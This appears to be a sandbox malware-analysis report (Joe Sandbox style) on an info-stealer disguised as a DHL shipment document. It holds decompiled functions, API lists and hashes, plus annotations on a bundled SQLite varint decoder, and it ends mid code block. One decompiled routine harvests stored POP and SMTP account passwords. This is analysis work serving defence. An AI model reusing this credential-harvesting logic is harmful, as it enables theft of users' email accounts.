                    • Opcode ID: 8dd52a8075b7bef316d0fc581140073ef821e073e46509cdb91d5efed9f2b539
                    • Instruction ID: e837d3b0865cda380a04769d40cc561620ee701a25bf2a33446201ee5459e2a9
                    • Opcode Fuzzy Hash: 8dd52a8075b7bef316d0fc581140073ef821e073e46509cdb91d5efed9f2b539
                    • Instruction Fuzzy Hash: A9C092B054430C3EFA102EF29D4AD3B3A8EEB41648B008435BE08E9096E977DE2061A8
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 100%
                    			E00404A19(void* _a4, short* _a8, void** _a12) {
                    				long _t5;
                    				void* _t6;
                    
                    				E004031E5(_t6, 9, 0xdb552da5, 0, 0);
                    				_t5 = RegOpenKeyW(_a4, _a8, _a12); // executed
                    				return _t5;
                    			}

                    0x00404a27
                    0x00404a35
                    0x00404a38

                    APIs
                    • RegOpenKeyW.ADVAPI32(?,?,?,00000009,DB552DA5,00000000,00000000), ref: 00404A35
                    Memory Dump Source
                    • Source File: 00000003.00000002.486364234.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_3_2_400000_DHL_Express_Shipment_DOC.jbxd
                    Yara matches
                    Similarity
                    • API ID: Open
                    • String ID:
                    • API String ID: 71445658-0
                    • Opcode ID: 878e79dc60d56a32ccce77cf818dc40cd176942d244c38d6301a2c771aeba921
                    • Instruction ID: b1d3f25f69c2166d3d07fcddbc0993e3b6974a4a806b5379996ceb22213e89af
                    • Opcode Fuzzy Hash: 878e79dc60d56a32ccce77cf818dc40cd176942d244c38d6301a2c771aeba921
                    • Instruction Fuzzy Hash: 5BC012311802087FFF012EC1CC02F483E1AAB08B55F044011BA18280E1EAB3A2205658
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 100%
                    			E00403C40(void* _a4) {
                    				int _t4;
                    				void* _t5;
                    
                    				E004031E5(_t5, 0, 0xfbce7a42, 0, 0);
                    				_t4 = FindCloseChangeNotification(_a4); // executed
                    				return _t4;
                    			}

                    0x00403c4d
                    0x00403c55
                    0x00403c58

                    APIs
                    • FindCloseChangeNotification.KERNELBASE(00000000,00000000,FBCE7A42,00000000,00000000,?,00404344,00000000,?,?,004146E2,00000000,00000000,?,00000000,00000000), ref: 00403C55
                    Memory Dump Source
                    • Source File: 00000003.00000002.486364234.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_3_2_400000_DHL_Express_Shipment_DOC.jbxd
                    Yara matches
                    Similarity
                    • API ID: ChangeCloseFindNotification
                    • String ID:
                    • API String ID: 2591292051-0
                    • Opcode ID: 67fd61e36e72385b159b193fd7e1560e83aa445b7d913ea69a34d34039b65f78
                    • Instruction ID: f60e35b61e15034c3e7e350ceef27d37971f1a6745175d5827dd76012fe363c0
                    • Opcode Fuzzy Hash: 67fd61e36e72385b159b193fd7e1560e83aa445b7d913ea69a34d34039b65f78
                    • Instruction Fuzzy Hash: 70B092B01182087EAE006AF29C05C3B3E4ECA4060874094267C08E5451F937DF2014B4
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 100%
                    			E00403C08(WCHAR* _a4) {
                    				int _t4;
                    				void* _t5;
                    
                    				E004031E5(_t5, 0, 0xdeaa357b, 0, 0);
                    				_t4 = DeleteFileW(_a4); // executed
                    				return _t4;
                    			}

                    0x00403c15
                    0x00403c1d
                    0x00403c20

                    APIs
                    • DeleteFileW.KERNELBASE(?,00000000,DEAA357B,00000000,00000000), ref: 00403C1D
                    Memory Dump Source
                    • Source File: 00000003.00000002.486364234.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_3_2_400000_DHL_Express_Shipment_DOC.jbxd
                    Yara matches
                    Similarity
                    • API ID: DeleteFile
                    • String ID:
                    • API String ID: 4033686569-0
                    • Opcode ID: 01b23650ea3b3ad0b7ef3e64b7b20365c040140a899dd4cba48e3dfa7394e9f1
                    • Instruction ID: 5639c68ad781144a2d68ff400f656d3d2c658e81fc8059c2e96e04b5885f7932
                    • Opcode Fuzzy Hash: 01b23650ea3b3ad0b7ef3e64b7b20365c040140a899dd4cba48e3dfa7394e9f1
                    • Instruction Fuzzy Hash: EDB092B04082093EAA013EF59C05C3B3E4DDA4010870048257D08E6111EA36DF1010A8
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 100%
                    			E00402C1F(WCHAR* _a4) {
                    				struct HINSTANCE__* _t4;
                    				void* _t5;
                    
                    				E004031E5(_t5, 0, 0xe811e8d4, 0, 0);
                    				_t4 = LoadLibraryW(_a4); // executed
                    				return _t4;
                    			}

                    0x00402c2c
                    0x00402c34
                    0x00402c37

                    APIs
                    • LoadLibraryW.KERNELBASE(?,00000000,E811E8D4,00000000,00000000), ref: 00402C34
                    Memory Dump Source
                    • Source File: 00000003.00000002.486364234.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_3_2_400000_DHL_Express_Shipment_DOC.jbxd
                    Yara matches
                    Similarity
                    • API ID: LibraryLoad
                    • String ID:
                    • API String ID: 1029625771-0
                    • Opcode ID: af34b662912c89fdb3a0f1b9ff73cd040c3e05ef601eeab43baa4f39a88cbda5
                    • Instruction ID: cd53f9395925d29cf68d66af6aae64644fca58afce9bbcd5edfe8b9605b00cd0
                    • Opcode Fuzzy Hash: af34b662912c89fdb3a0f1b9ff73cd040c3e05ef601eeab43baa4f39a88cbda5
                    • Instruction Fuzzy Hash: C9B092B00082083EAA002EF59C05C7F3A4DDA4410874044397C08E5411F937DE1012A5
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 100%
                    			E00403BEF(void* _a4) {
                    				int _t4;
                    				void* _t5;
                    
                    				E004031E5(_t5, 0, 0xda6ae59a, 0, 0);
                    				_t4 = FindClose(_a4); // executed
                    				return _t4;
                    			}

                    0x00403bfc
                    0x00403c04
                    0x00403c07

                    APIs
                    • FindClose.KERNELBASE(00403F8D,00000000,DA6AE59A,00000000,00000000,?,00403F8D,00000000), ref: 00403C04
                    Memory Dump Source
                    • Source File: 00000003.00000002.486364234.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_3_2_400000_DHL_Express_Shipment_DOC.jbxd
                    Yara matches
                    Similarity
                    • API ID: CloseFind
                    • String ID:
                    • API String ID: 1863332320-0
                    • Opcode ID: 9873c53fda05388afb850746851f5e32e8254642b63e91831ef49aacf0f87411
                    • Instruction ID: 1ebc74916e7009c76bd4f38d62a0f1d2d6d24e136e2668fcc01a71b48f24aa02
                    • Opcode Fuzzy Hash: 9873c53fda05388afb850746851f5e32e8254642b63e91831ef49aacf0f87411
                    • Instruction Fuzzy Hash: FDB092B00442087EEE002EF1AC05C7B3F4EDA4410970044257E0CE5012E937DF1010B4
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 100%
                    			E00403BB7(WCHAR* _a4) {
                    				long _t4;
                    				void* _t5;
                    
                    				E004031E5(_t5, 0, 0xc6808176, 0, 0);
                    				_t4 = GetFileAttributesW(_a4); // executed
                    				return _t4;
                    			}

                    0x00403bc4
                    0x00403bcc
                    0x00403bcf

                    APIs
                    • GetFileAttributesW.KERNELBASE(00413D1F,00000000,C6808176,00000000,00000000,?,00403D58,00413D1F,?,00403C6D,00413D1F,?,00413D1F,00000000), ref: 00403BCC
                    Memory Dump Source
                    • Source File: 00000003.00000002.486364234.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_3_2_400000_DHL_Express_Shipment_DOC.jbxd
                    Yara matches
                    Similarity
                    • API ID: AttributesFile
                    • String ID:
                    • API String ID: 3188754299-0
                    • Opcode ID: 1d6dd25f7c332fd1d35fbf5985813ee51de81cf8f6e5d0f963c2f0c9ec148b39
                    • Instruction ID: 12c622a32f4ce0ce5baf48af10e49973588d22e73ecb696d4958cc4f11b8a016
                    • Opcode Fuzzy Hash: 1d6dd25f7c332fd1d35fbf5985813ee51de81cf8f6e5d0f963c2f0c9ec148b39
                    • Instruction Fuzzy Hash: D2B092B05042083EAE012EF19C05C7B3A6DCA40148B4088297C18E5111ED36DE5050A4
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 100%
                    			E004049FF(void* _a4) {
                    				long _t3;
                    				void* _t4;
                    
                    				E004031E5(_t4, 9, 0xd980e875, 0, 0);
                    				_t3 = RegCloseKey(_a4); // executed
                    				return _t3;
                    			}

                    0x00404a0d
                    0x00404a15
                    0x00404a18

                    APIs
                    • RegCloseKey.KERNELBASE(00000000,00000009,D980E875,00000000,00000000,?,00404A44,?,?,00404AC6,?), ref: 00404A15
                    Memory Dump Source
                    • Source File: 00000003.00000002.486364234.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_3_2_400000_DHL_Express_Shipment_DOC.jbxd
                    Yara matches
                    Similarity
                    • API ID: Close
                    • String ID:
                    • API String ID: 3535843008-0
                    • Opcode ID: a61027cf4d9072e61279d4b4f16a9571f3d05446971c54f2b184413104fd85b7
                    • Instruction ID: 75bcc15c4d71fff8019d16f1d9debb39272117f3de5fdcc107556e34aff8dcac
                    • Opcode Fuzzy Hash: a61027cf4d9072e61279d4b4f16a9571f3d05446971c54f2b184413104fd85b7
                    • Instruction Fuzzy Hash: 7CC092312843087AEA102AE2EC0BF093E0D9B41F98F500025B61C3C1D2E9E3E6100099
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 100%
                    			E00403B64(WCHAR* _a4) {
                    				int _t3;
                    				void* _t4;
                    
                    				E004031E5(_t4, 2, 0xdc0853e1, 0, 0);
                    				_t3 = PathFileExistsW(_a4); // executed
                    				return _t3;
                    			}

                    0x00403b72
                    0x00403b7a
                    0x00403b7d

                    APIs
                    • PathFileExistsW.KERNELBASE(?,00000002,DC0853E1,00000000,00000000), ref: 00403B7A
                    Memory Dump Source
                    • Source File: 00000003.00000002.486364234.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_3_2_400000_DHL_Express_Shipment_DOC.jbxd
                    Yara matches
                    Similarity
                    • API ID: ExistsFilePath
                    • String ID:
                    • API String ID: 1174141254-0
                    • Opcode ID: 79b415000e3dec3248a6d2155c6771fe406342b29d1d2faf8e1af97ba013cdd8
                    • Instruction ID: 8bd75bc93bbce64143a6918826fd0663652f5dbe7ab318808702af7ec0dd126f
                    • Opcode Fuzzy Hash: 79b415000e3dec3248a6d2155c6771fe406342b29d1d2faf8e1af97ba013cdd8
                    • Instruction Fuzzy Hash: F4C0923028830C3BF9113AD2DC47F197E8D8B41B99F104025B70C3C4D2D9E3A6100199
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • closesocket.WS2_32(00404EB0), ref: 00404DEB
                    Memory Dump Source
                    • Source File: 00000003.00000002.486364234.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_3_2_400000_DHL_Express_Shipment_DOC.jbxd
                    Yara matches
                    Similarity
                    • API ID: closesocket
                    • String ID:
                    • API String ID: 2781271927-0
                    • Opcode ID: 887654383893d56b64fc04469bc98b787ac4c367861e76a9ad562a01a17cc3aa
                    • Instruction ID: a7719220e23c04317d26723f710bfa070304820e6d91f105ed764937a1a9d613
                    • Opcode Fuzzy Hash: 887654383893d56b64fc04469bc98b787ac4c367861e76a9ad562a01a17cc3aa
                    • Instruction Fuzzy Hash: F4A0113000020CEBCB002B82EE088C83F2CEA882A0B808020F80C00020CB22A8208AC8
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 100%
                    			E00403F9E(void* _a4) {
                    				int _t3;
                    				void* _t4;
                    
                    				E004031E5(_t4, 0, 0xf53ecacb, 0, 0);
                    				_t3 = VirtualFree(_a4, 0, 0x8000); // executed
                    				return _t3;
                    			}

                    0x00403fac
                    0x00403fba
                    0x00403fbe

                    APIs
                    • VirtualFree.KERNELBASE(0041028C,00000000,00008000,00000000,F53ECACB,00000000,00000000,00000000,?,0041028C,00000000), ref: 00403FBA
                    Memory Dump Source
                    • Source File: 00000003.00000002.486364234.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_3_2_400000_DHL_Express_Shipment_DOC.jbxd
                    Yara matches
                    Similarity
                    • API ID: FreeVirtual
                    • String ID:
                    • API String ID: 1263568516-0
                    • Opcode ID: 4437192c676a59da206b473fb72d9d26ef1781d862ceba0a26f5730449a5d479
                    • Instruction ID: 31a36aa897feec3f2575a3818ba469950b8b51fe97d839facc05156de448dee4
                    • Opcode Fuzzy Hash: 4437192c676a59da206b473fb72d9d26ef1781d862ceba0a26f5730449a5d479
                    • Instruction Fuzzy Hash: 9CC08C3200613C32893069DBAC0AFCB7E0CDF036F4B104021F50C6404049235A0186F8
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 100%
                    			E00406472(long _a4) {
                    				void* _t3;
                    				void* _t4;
                    
                    				_t3 = E004031E5(_t4, 0, 0xcfa329ad, 0, 0);
                    				Sleep(_a4); // executed
                    				return _t3;
                    			}

                    0x0040647f
                    0x00406487
                    0x0040648a

                    APIs
                    • Sleep.KERNELBASE(?,00000000,CFA329AD,00000000,00000000), ref: 00406487
                    Memory Dump Source
                    • Source File: 00000003.00000002.486364234.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_3_2_400000_DHL_Express_Shipment_DOC.jbxd
                    Yara matches
                    Similarity
                    • API ID: Sleep
                    • String ID:
                    • API String ID: 3472027048-0
                    • Opcode ID: 1807eaeb392d941871dd7f4dce37bd4a7f558bd6a955fa7349a6f4d515d7796f
                    • Instruction ID: 8d08050a97d9600d7c0dbf2a5018eca7d85037e123ae0040efa9f3f0a7dd9c36
                    • Opcode Fuzzy Hash: 1807eaeb392d941871dd7f4dce37bd4a7f558bd6a955fa7349a6f4d515d7796f
                    • Instruction Fuzzy Hash: FBB092B08082083EEA002AF1AD05C3B7A8DDA4020870088257C08E5011E93ADE1150B9
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 100%
                    			E004058EA(char* _a4, char* _a8) {
                    				char* _t4;
                    				void* _t5;
                    
                    				E004031E5(_t5, 2, 0xc5c16604, 0, 0);
                    				_t4 = StrStrA(_a4, _a8); // executed
                    				return _t4;
                    			}

                    0x004058f8
                    0x00405903
                    0x00405906

                    APIs
                    • StrStrA.KERNELBASE(?,?,00000002,C5C16604,00000000,00000000), ref: 00405903
                    Memory Dump Source
                    • Source File: 00000003.00000002.486364234.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_3_2_400000_DHL_Express_Shipment_DOC.jbxd
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 042642b6324743061f7cb6dcc4248db4a99ff7c1e794a59b5538058313c095a3
                    • Instruction ID: d5512459148ba4630ff55d530b0b04b7b8071b1588054f6e556ec5c474e97d6d
                    • Opcode Fuzzy Hash: 042642b6324743061f7cb6dcc4248db4a99ff7c1e794a59b5538058313c095a3
                    • Instruction Fuzzy Hash: 82C04C3118520876EA112AD19C07F597E1D9B45B68F108425BA1C6C4D19AB3A6505559
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 100%
                    			E00405924(WCHAR* _a4, WCHAR* _a8) {
                    				WCHAR* _t4;
                    				void* _t5;
                    
                    				E004031E5(_t5, 2, 0xd6865bd4, 0, 0);
                    				_t4 = StrStrW(_a4, _a8); // executed
                    				return _t4;
                    			}

                    0x00405932
                    0x0040593d
                    0x00405940

                    APIs
                    • StrStrW.KERNELBASE(?,?,00000002,D6865BD4,00000000,00000000), ref: 0040593D
                    Memory Dump Source
                    • Source File: 00000003.00000002.486364234.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_3_2_400000_DHL_Express_Shipment_DOC.jbxd
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 4bee70add85649cbd4a2768cfe9b9dcd091b7df8922090f97a094487be0f2036
                    • Instruction ID: 5151f40d070928696ad3a3dfeafe9e6e8178c5ee17630b0dfe73cc98556a196c
                    • Opcode Fuzzy Hash: 4bee70add85649cbd4a2768cfe9b9dcd091b7df8922090f97a094487be0f2036
                    • Instruction Fuzzy Hash: 8FC04C311842087AEA112FD2DC07F587E1D9B45B58F104015B61C2C5D1DAB3A6105659
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • CoInitialize.OLE32(00000000), ref: 0040438F
                    • CoCreateInstance.OLE32(00418EC0,00000000,00000001,00418EB0,?), ref: 004043A9
                    • VariantInit.OLEAUT32(?), ref: 004043C4
                    • SysAllocString.OLEAUT32(?), ref: 004043CD
                    • VariantInit.OLEAUT32(?), ref: 00404414
                    • SysAllocString.OLEAUT32(?), ref: 00404419
                    • VariantInit.OLEAUT32(?), ref: 00404431
                    Memory Dump Source
                    • Source File: 00000003.00000002.486364234.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_3_2_400000_DHL_Express_Shipment_DOC.jbxd
                    Yara matches
                    Similarity
                    • API ID: InitVariant$AllocString$CreateInitializeInstance
                    • String ID:
                    • API String ID: 1312198159-0
                    • Opcode ID: 36af1e644ba25a92da10ffd92c092694d7a96ee7919212810e1bb10a92bc3d30
                    • Instruction ID: 6cc2ba4480fbb4d68866773ab5e076051400aafb7d2546f6199fc19a864342a4
                    • Opcode Fuzzy Hash: 36af1e644ba25a92da10ffd92c092694d7a96ee7919212810e1bb10a92bc3d30
                    • Instruction Fuzzy Hash: 9A414C71A00609EFDB00EFE4DC84ADEBF79FF89314F10406AFA05AB190DB759A458B94
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 88%
                    			E0040D069(void* __ebx, void* __eflags, intOrPtr* _a4) {
                    				signed int _v8;
                    				signed int _v12;
                    				intOrPtr _v16;
                    				intOrPtr _v20;
                    				intOrPtr _v24;
                    				intOrPtr _v28;
                    				intOrPtr _v32;
                    				intOrPtr _v36;
                    				intOrPtr _v40;
                    				intOrPtr _v44;
                    				void* __edi;
                    				void* __esi;
                    				intOrPtr _t40;
                    				intOrPtr _t45;
                    				intOrPtr _t47;
                    				void* _t71;
                    				void* _t75;
                    				void* _t77;
                    
                    				_t72 = _a4;
                    				_t71 = E00404BEE(__ebx,  *_a4, L"EmailAddress");
                    				_t81 = _t71;
                    				if(_t71 != 0) {
                    					_push(__ebx);
                    					_t67 = E00404BEE(__ebx,  *_t72, L"Technology");
                    					_v16 = E00404BEE(_t37,  *_t72, L"PopServer");
                    					_v40 = E00404BA7(_t81,  *_t72, L"PopPort");
                    					_t40 = E00404BEE(_t37,  *_t72, L"PopAccount");
                    					_v8 = _v8 & 0x00000000;
                    					_v20 = _t40;
                    					_v24 = E00404C4E(_t71,  *_t72, L"PopPassword",  &_v8);
                    					_v28 = E00404BEE(_t67,  *_t72, L"SmtpServer");
                    					_v44 = E00404BA7(_t81,  *_t72, L"SmtpPort");
                    					_t45 = E00404BEE(_t67,  *_t72, L"SmtpAccount");
                    					_v12 = _v12 & 0x00000000;
                    					_v32 = _t45;
                    					_t47 = E00404C4E(_t71,  *_t72, L"SmtpPassword",  &_v12);
                    					_t77 = _t75 + 0x50;
                    					_v36 = _t47;
                    					if(_v8 != 0 || _v12 != 0) {
                    						E00405872( *0x49f934, _t71, 1, 0);
                    						E00405872( *0x49f934, _t67, 1, 0);
                    						_t74 = _v16;
                    						E00405872( *0x49f934, _v16, 1, 0);
                    						E00405781( *0x49f934, _v40);
                    						E00405872( *0x49f934, _v20, 1, 0);
                    						_push(_v8);
                    						E00405762(_v16,  *0x49f934, _v24);
                    						E00405872( *0x49f934, _v28, 1, 0);
                    						E00405781( *0x49f934, _v44);
                    						E00405872( *0x49f934, _v32, 1, 0);
                    						_push(_v12);
                    						E00405762(_t74,  *0x49f934, _v36);
                    						_t77 = _t77 + 0x88;
                    					} else {
                    						_t74 = _v16;
                    					}
                    					E0040471C(_t71);
                    					E0040471C(_t67);
                    					E0040471C(_t74);
                    					E0040471C(_v20);
                    					E0040471C(_v24);
                    					E0040471C(_v28);
                    					E0040471C(_v32);
                    					E0040471C(_v36);
                    				}
                    				return 1;
                    			}

                    0x0040d070
                    0x0040d080
                    0x0040d084
                    0x0040d086
                    0x0040d08c
                    0x0040d0a0
                    0x0040d0ae
                    0x0040d0bd
                    0x0040d0c0
                    0x0040d0c5
                    0x0040d0c9
                    0x0040d0e3
                    0x0040d0f2
                    0x0040d101
                    0x0040d104
                    0x0040d109
                    0x0040d110
                    0x0040d11e
                    0x0040d123
                    0x0040d126
                    0x0040d12d
                    0x0040d145
                    0x0040d154
                    0x0040d15a
                    0x0040d166
                    0x0040d174
                    0x0040d186
                    0x0040d18e
                    0x0040d19a
                    0x0040d1ac
                    0x0040d1ba
                    0x0040d1cc
                    0x0040d1d1
                    0x0040d1dd
                    0x0040d1e2
                    0x0040d1e7
                    0x0040d1e7
                    0x0040d1e7
                    0x0040d1eb
                    0x0040d1f1
                    0x0040d1f7
                    0x0040d1ff
                    0x0040d207
                    0x0040d20f
                    0x0040d217
                    0x0040d21f
                    0x0040d227
                    0x0040d230

                    Strings
                    Memory Dump Source
                    • Source File: 00000003.00000002.486364234.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_3_2_400000_DHL_Express_Shipment_DOC.jbxd
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID: EmailAddress$PopAccount$PopPassword$PopPort$PopServer$SmtpAccount$SmtpPassword$SmtpPort$SmtpServer$Technology
                    • API String ID: 0-2111798378
                    • Opcode ID: 4f23c8655d16a9709c8d74bd686147b8dbb65e0931b573aa619d5bf1b9c89d18
                    • Instruction ID: 091e628055053f5eef329adcdd4db079f25726ad560f051e033024c376855220
                    • Opcode Fuzzy Hash: 4f23c8655d16a9709c8d74bd686147b8dbb65e0931b573aa619d5bf1b9c89d18
                    • Instruction Fuzzy Hash: AE414EB5941218BADF127BE6DD42F9E7F76EF94304F21003AF600721B2C77A99609B48
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 100%
                    			/* SQLite varint decoder, i.e. sqlite3GetVarint(): _a4 points at 1..9 input
                    			   bytes, _a8 receives the 64-bit value as low dword / high dword, and the
                    			   return value is the number of bytes consumed. Bytes 0..7 carry 7 bits
                    			   each with bit 7 as the continuation flag; a 9th byte, if reached,
                    			   contributes all 8 bits. The decompiler rendered each 'test byte, byte / js'
                    			   on a freshly read byte as a signed compare on a zero-extended int (which
                    			   would always be >= 0, making the function return 1 unconditionally), so
                    			   the conditions below spell out the bit-7 test the assembly performs.
                    			   0x001fc07f keeps two 7-bit groups 14 bits apart, 0xf01fc07f additionally
                    			   keeps the top four bits. A statically linked SQLite is consistent with
                    			   the browser-harvesting signature above: browser credential and history
                    			   stores are SQLite files. */
                    			E0040549C(signed int _a4, signed int* _a8) {
                    				signed int* _t46;
                    				void* _t47;
                    				signed int* _t48;
                    				signed int* _t49;
                    				signed int* _t50;
                    				signed int* _t51;
                    				signed int* _t52;
                    				signed int* _t53;
                    				signed int* _t55;
                    				signed int* _t57;
                    				signed int _t59;
                    				signed int _t61;
                    				signed int _t62;
                    				unsigned int _t64;
                    				signed int _t77;
                    				signed int _t79;
                    				signed int _t81;
                    				signed int _t95;
                    				signed int _t97;
                    				signed int _t98;
                    				signed int _t100;
                    				signed int _t102;
                    				signed char* _t124;
                    
                    				_t124 = _a4;
                    				_t59 =  *_t124 & 0x000000ff;                              /* byte 0 */
                    				if((_t59 & 0x80) == 0) {                                   /* 1 byte: value < 0x80 */
                    					_t57 = _a8;
                    					_t57[1] = _t57[1] & 0x00000000;
                    					 *_t57 = _t59;
                    					return 1;
                    				}
                    				_t95 = _t124[1] & 0x000000ff;                             /* byte 1 */
                    				if((_t95 & 0x80) == 0) {
                    					_t55 = _a8;
                    					_t55[1] = _t55[1] & 0x00000000;
                    					 *_t55 = (_t59 & 0x0000007f) << 0x00000007 | _t95;
                    					return 2;
                    				}
                    				_t61 = _t59 << 0x0000000e | _t124[2] & 0x000000ff;        /* byte0<<14 | byte2 */
                    				if((_t61 & 0x80) != 0) {
                    					_t97 = _t95 << 0x0000000e | _t124[3] & 0x000000ff;    /* byte1<<14 | byte3 */
                    					_t62 = _t61 & 0x001fc07f;
                    					if((_t97 & 0x80) != 0) {
                    						_t98 = _t97 & 0x001fc07f;
                    						_t77 = _t62 << 0x0000000e | _t124[4] & 0x000000ff;   /* + byte4 */
                    						if((_t77 & 0x80) != 0) {
                    							_t64 = _t62 << 0x00000007 | _t98;                /* bytes 0..3 packed: source of the high dword */
                    							_t100 = _t98 << 0x0000000e | _t124[5] & 0x000000ff;   /* + byte5 */
                    							if((_t100 & 0x80) != 0) {
                    								_t79 = _t77 << 0x0000000e | _t124[6] & 0x000000ff;   /* + byte6 */
                    								if((_t79 & 0x80) != 0) {
                    									_t102 = _t100 << 0x0000000e | _t124[7] & 0x000000ff;   /* + byte7 */
                    									_t81 = (_t79 & 0x001fc07f) << 7;
                    									if((_t102 & 0x80) != 0) {
                    										/* 9 bytes: byte 8 is taken whole, it has no flag bit */
                    										_t46 = _a8;
                    										 *_t46 = (_t102 & 0x001fc07f | _t81) << 0x00000008 | _t124[8] & 0x000000ff;
                    										_t46[1] = (_t124[4] & 0x000000ff) >> 0x00000003 & 0x0000000f | _t64 << 0x00000004;
                    										_t47 = 9;
                    									} else {
                    										_t48 = _a8;
                    										 *_t48 = _t102 & 0xf01fc07f | _t81;
                    										_t48[1] = _t64 >> 4;
                    										_t47 = 8;
                    									}
                    								} else {
                    									_t49 = _a8;
                    									/* masked merge: (_t79 & 0xf01fc07f) | ((_t100 & 0x001fc07f) << 7) */
                    									 *_t49 = (_t100 << 0x00000007 ^ _t79) & 0x0fe03f80 ^ _t79;
                    									_t49[1] = _t64 >> 0xb;
                    									_t47 = 7;
                    								}
                    							} else {
                    								_t50 = _a8;
                    								_a4 = (_t77 & 0x001fc07f) << 0x00000007 | _t100;   /* argument slot reused as a temporary */
                    								 *_t50 = _a4;
                    								_t50[1] = _t64 >> 0x12;
                    								_t47 = 6;
                    							}
                    						} else {
                    							_t51 = _a8;
                    							 *_t51 = _t98 << 0x00000007 | _t77;
                    							_t51[1] = _t62 >> 0x12;
                    							_t47 = 5;
                    						}
                    					} else {
                    						_t52 = _a8;
                    						_t52[1] = _t52[1] & 0x00000000;
                    						 *_t52 = _t97 & 0x001fc07f | _t62 << 0x00000007;
                    						_t47 = 4;
                    					}
                    					return _t47;
                    				} else {
                    					_t53 = _a8;
                    					_t53[1] = _t53[1] & 0x00000000;
                    					 *_t53 = (_t95 & 0x0000007f) << 0x00000007 | _t61 & 0x001fc07f;
                    					return 3;
                    				}
                    			}

                    (instruction address column of the side-by-side view: 0x004054a1 to 0x00405615)

                    Memory Dump Source
                    • Source File: 00000003.00000002.486364234.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_3_2_400000_DHL_Express_Shipment_DOC.jbxd
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: db4539c410e0fe4373e7c5db18565f275e95a05af4a94000d4ba81a11fef15ca
                    • Instruction ID: 891bc98f6eee734ec0083ebf38281cede3cc23ab6c94fa2f23d2f5c2768c820d
                    • Opcode Fuzzy Hash: db4539c410e0fe4373e7c5db18565f275e95a05af4a94000d4ba81a11fef15ca
                    • Instruction Fuzzy Hash: D141F1B0614B205EE30C8F19C895676BFE2EF82341748C07EE8AE8F695C635D506EF58
                    Uniqueness

                    Uniqueness Score: -1.00%
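
E0040549C above is, bit for bit, the logic of SQLite's sqlite3GetVarint(): the unrolled form is how SQLite decodes the 1- to 9-byte integers that prefix every cell and record in a database file, and a stealer that carries its own copy can walk the SQLite files browsers keep credentials and history in without depending on the host. The block below is an added illustration, not code from the sample, from SQLite or from this report: a plain decoder and encoder for the same format with the bit-7 test written out and a length check the unrolled version lacks, plus a walker over a record header (a constructed four-byte header, not one taken from the dump) so the format's use is visible. The serial-type size rule is the one from the SQLite file format; the 9-byte edge case, where the last byte contributes eight bits, is covered by the vector kNineByte.

```c
#include <stdint.h>
#include <stddef.h>
#include <stdio.h>

/* SQLite varint: bytes 0..7 carry 7 payload bits each, bit 7 set meaning
 * "more follows"; if all eight have bit 7 set, a 9th byte supplies 8 payload
 * bits (64 bits total). Returns bytes consumed (1..9), or 0 when the buffer
 * ends before the value does (the sample's unrolled decoder has no such check). */
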